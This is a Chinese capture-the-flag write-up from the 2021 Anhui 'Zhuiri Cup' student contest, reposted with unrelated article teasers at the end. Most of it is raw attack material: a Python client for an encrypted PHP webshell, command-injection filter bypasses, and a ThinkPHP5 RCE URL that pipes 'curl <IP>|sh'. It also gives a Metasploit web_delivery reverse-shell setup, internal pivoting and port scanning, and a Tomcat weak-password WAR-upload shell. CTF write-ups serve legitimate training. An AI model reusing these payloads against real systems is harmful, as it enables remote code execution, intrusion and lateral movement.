首届安徽"追日杯"大学生网络安全挑战赛WRITEUP
白帽子社区
共 4578字,需浏览 10分钟
· 2021-12-12
首届安徽"追日杯"大学生网络安全挑战赛 WRITEUP
本文来自“白帽子社区知识星球”
作者:WHT战队
一打开题目复制答案,提交即可。
flag值:flag{welcome_to_zrb@2021}
Exp:
```
python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2021/12/5 10:59
# @Author : upload
# @File : ada.py
# @Software: PyCharm
import requests
import zlib
import re
import base64
def x(t,k):
return ''.join([chr(ord(x)^ord(y)) for x,y in zip(t,k*(len(t)/len(k)+1))])
session = requests.Session()
# @eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));
cmd = 'system("cat /flag");'
cmd = zlib.compress(cmd)
cmd = x(cmd,"25ed1bcb")
cmd = base64.b64encode(cmd)
rawBody = "423b0b7200f4{cmd}85fc5ff71c8e".format(cmd=cmd)
print(rawBody)
response = session.post("http://ctf.zrb.edisec.net:19859//index.php", data=rawBody)
print("Response body: %s" % response.content)
res = re.findall(r'niGqOXD4rBhBWZ7t423b0b7200f4(.+)85fc5ff71c8e',response.content)[0]
# $r=@base64_encode(@x(@gzcompress($o),$k));
res = base64.b64decode(res)
res = x(res,"25ed1bcb")
res = zlib.decompress(res)
print(res)
```
```
python
import requests
session = requests.session()
import requests
burp0_url = "http://ctf.zrb.edisec.net:30989/flag"
burp0_headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://ctf.zrb.edisec.net:34231/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
ip = "http://ctf.zrb.edisec.net:34231"
r1 = session.get(url=burp0_url,allow_redirects=False)
print(r1.headers.get('Location'))
r2 = session.get(r1.headers.get('Location'),allow_redirects=False)
print(r2.headers.get('Location'))
url = ip + r2.headers.get('Location')
for i in range(0,1000):
r3 = session.get(url,allow_redirects=False)
print(r3.text)
url = ip + r3.headers.get('Location')
print(url)
经测试:
①绕过空格 %09
②列目录命令 du -a . 或chgrp -v -R
③ 查看文件 sed p
查看文件:
?cmd=sed%09p%09f1ag_1s_here%09
```
```
http://ctf.zrb.edisec.net:57807/?cmd='.`sed%09p%09/cccccreal_flag_here_ccccfffffffllllllllaggggg%09`.'
```
thinkphp5 rce反弹shell
http://82.156.76.152:8077/?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20116.62.104.172|sh
上线msf
```
use exploit/multi/script/web_delivery
show targets
set target 6
set payload linux/x64/meterpreter/reverse_tcp
set lhost 10.18.228.36
run
```
查看网段
添加路由
```
run autoroute -s 10.134.110.0/24
```
扫描存活主机
```
msf6 auxiliary(scanner/portscan/tcp) > run
[*] 1.14.65.168 - Meterpreter session 6 closed. Reason: Died
[*] Sending stage (3008420 bytes) to 1.14.65.168
[+] 10.134.110.26: - 10.134.110.26:8080 - TCP OPEN
[*] 10.134.110.0/24: - Scanned 26 of 256 hosts (10% complete)
[+] 10.134.110.34: - 10.134.110.34:3306 - TCP OPEN
[+] 10.134.110.52: - 10.134.110.52:80 - TCP OPEN
[+] 10.134.110.52: - 10.134.110.52:6379 - TCP OPEN
[*] 10.134.110.0/24: - Scanned 52 of 256 hosts (20% complete)
[*] 10.134.110.0/24: - Scanned 78 of 256 hosts (30% complete)
[*] 10.134.110.0/24: - Scanned 103 of 256 hosts (40% complete)
[*] Meterpreter session 8 opened (172.16.174.127:4444 -> 1.14.65.168:41826) at 2021-12-05 14:06:12 +0800
[*] 10.134.110.0/24: - Scanned 128 of 256 hosts (50% complete)
[*] 10.134.110.0/24: - Scanned 155 of 256 hosts (60% complete)
[*] 10.134.110.0/24: - Scanned 180 of 256 hosts (70% complete)
[*] 10.134.110.0/24: - Scanned 205 of 256 hosts (80% complete)
[*] 10.134.110.0/24: - Scanned 231 of 256 hosts (90% complete)
[*] 10.134.110.0/24: - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
```
发现存活主机10.134.110.26开放了8080端口
10.134.110.26:8080
使用msf将8080转发到8082端口
```
portfwd add -l 8082 -p 8080 -r 10.134.110.26
```
为一个tomcat服务
```
/manager/html
```
弱口令tomcat/tomcat,部署war包,拿到flag3
116.62.104.172:8082/cmd/cmd.jsp?cmd=cat+%2Fflag3
如果觉得本文不错的话,欢迎加入知识星球,星球内部设立了多个技术版块,目前涵盖“WEB安全”、“内网渗透”、“CTF技术区”、“漏洞分析”、“工具分享”五大类,还可以与嘉宾大佬们接触,在线答疑、互相探讨。
▼扫码关注白帽子社区公众号&加入知识星球▼
评论
FaceChain高保真人像风格生成挑战赛:一等奖方案
Datawhale分享 作者:马琦钧,Datawhale成员简 介大家好,我是马琦钧,Datawhale成员,毕业于浙江农林大学,统计学/会计学双学位,获得过由阿里云、谷歌、百度、CVPR、思否、极棒等举办的相关赛事奖项。本次主要分享 FaceChain 高保真人像风
Datawhale
1
学习开放日:开放复杂科学、AI+X 海量学习资源!
Datawhale干货 学习开放日:4月27-28日1. 什么是学习开放日?以AI为代表的技术突飞猛进,人类知识森林快速扩张,仅凭一人之力不仅难以覆盖,更是难以串联知识线索。唯有像蚂蚁探索最优路径一样,我们才能在信息爆炸的知识森林中探索出更好的方向!因此,今年集智斑图联合国内最
Datawhale
1
日本影山优佳最新杂志照,展现充满透明感的美丽
今天的图文分享的是影山优佳的杂志写真。元日向坂46的影山优佳,登上了写真杂志《周刊FLASH》5/7和5/14合并号的封面。影山优佳是日本艺人、女演员、前偶像。身高155厘米。2001年5月8日出生于东京都。2023年7月从组合日向坂46毕业,之后作为演员活跃的影山优佳,在《周刊FLAS
python教程
0
一些常见网络安全术语
1、黑帽 为非法目的进行黑客攻击的人,通常是为了经济利益。他们进入安全网络以销毁,赎回,修改或窃取数据,或使网络无法用于授权用户。这个名字来源于这样一个事实:老式的黑白西部电影中的恶棍很容易被电影观...
马哥Linux运维
0
李想认错!发内部信反思MEGA问题;娃哈哈客服回应网店日销售额暴...
市场监管总局等六部门明确预制菜定义和范围,生产过程不允许添加防腐剂 记者21日从市场监管总局获悉,市场监管总局联合教育部、工业和信息化部、农业农村部、商务部、国家卫生健康委印发《关于加强预制菜食品安全监...
亿欧网
0
2024年互联网公益“中国样本” 研究员开放日来了
为打造开放包容的思想交流平台、促进研究员更深了解中国互联网公益发展,3月22日至23日,2024年互联网公益“中国样本” 研究员开放日将在腾讯(北京总部)举办。届时首批加入开放研究计划的8家公益组织与平台负责人,...
腾云
0
传完美世界大裁员,出售游戏业务,赔偿方案曝光;罗永浩自曝曾被校园霸凌;追觅科技回应上市传闻丨雷峰早报
要闻提示NEWS REMIND1.阿里高层调整下一步:汪海将「出局」,B2B业务all-in出海2.完美世界核心项目被曝裁员,净利润再度腰斩,赔偿方案曝光3.胖东来员工到手薪资不低于7000元,流失率低,每周单休无小长假,多岗位使...
雷锋网
0
【Web3Event】首届东南亚区块链周SEABW(含门票特价
点击关注 区块链活动 ,置顶公众号 聚焦全球优质区块链活动,区块链世界的活动入口! ━━━━━━ 首届东南亚区块链周 SouthEast Asia Blockchain Week 定于4月22日在泰国曼谷举行,大会为期两天,关注 GameFi、Defi、NFT...
区块链活动
0